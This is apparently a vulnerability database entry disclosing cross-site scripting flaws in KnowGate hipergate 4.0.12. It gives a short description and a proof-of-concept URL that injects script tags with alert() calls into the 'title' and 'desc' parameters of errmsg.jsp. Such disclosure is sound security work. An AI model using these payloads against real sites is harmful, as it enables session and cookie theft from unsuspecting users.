KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities
Author: Nahuel Grisolia
type: webapps
platform: jsp
port:
date_added: 2010-02-04
date_updated: 2014-06-01
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/38094/info
KnowGate hipergate is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
KnowGate hipergate 4.0.12 is vulnerable; other versions may also be affected.
http://www.example.com:8080/hipergate/common/errmsg.jsp?title=%3Cscript%3Ealert%28%22titleXSS%22%29;
%3C/script%3E&desc=%3Cscript%3Ealert%28%22descXSS%22%29;%3C/script%3E&resume=_back